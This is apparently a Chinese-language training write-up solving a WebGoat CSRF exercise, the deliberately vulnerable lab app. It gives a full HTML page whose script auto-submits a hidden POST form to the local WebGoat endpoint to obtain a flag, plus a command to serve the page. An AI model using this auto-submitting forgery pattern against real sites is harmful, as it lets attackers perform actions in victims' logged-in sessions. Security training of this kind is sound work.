A3:基本的 CSRF 攻击,通过自动提交表单来获取 flag
在 WebGoat 的题目界面(CSRF)中,通过开发者工具查找隐藏的表单 action。

编写脚本 attack1.html,直接保存为 HTML 文件。确保浏览器已打开 WebGoat,点击该文件或启动本地 HTTP 服务后访问。
<!DOCTYPE html>
<html>
<body>
<form id="csrf" action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag" method="POST" target="_blank">
<input type="hidden" name="csrf" value="false">
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
启动 http 服务示例:
python -m http.server 8000
在浏览器导航栏输入 http://localhost:8000/attack1.html,获取 Flag 并复制提交。











